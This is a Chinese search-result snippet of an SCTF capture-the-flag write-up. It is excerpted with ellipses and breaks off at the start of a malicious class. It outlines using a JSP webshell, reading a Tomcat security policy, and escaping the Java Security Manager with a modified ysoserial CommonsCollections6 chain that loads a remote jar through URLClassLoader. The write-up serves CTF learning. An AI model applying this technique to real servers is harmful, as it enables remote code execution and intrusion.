首页
学习
活动
专区
工具
TVP
发布
您找到你想要的搜索结果了吗?
是的
没有找到

SCTF WriteUp

或者直接 s3 cp 到本地来: babyEoP 访问后是一个 jsp webshell password 123456 进去之后发现执行命令、写文件等权限都被禁止,根据页面报错可以看出来, 开启了 java...,于是读一下策略文件: C:/babyEoP/apache-tomcat-8.5.42/conf/catalina.policy JSM 策略走的是白名单机制,没列出来的权限就代表没有。...现在的思路就转变为,绕过JSM META-INF/MANIFEST.MF Manifest-Version: 1.0 Built-By: Jaylin Created-By: Apache Maven...所以需要通过远程加载的方式,这里使用 URLClassLoader 来远程加载 jar 包完成 魔改 ”ysoserial“CommonsCollections6 的 transformers ,把 java.lang.Runtime.exec...改成 java.net.URLClassLoader 就可以加载远程 jar 包了 恶意 class : public class V { static { System.load

1K30
领券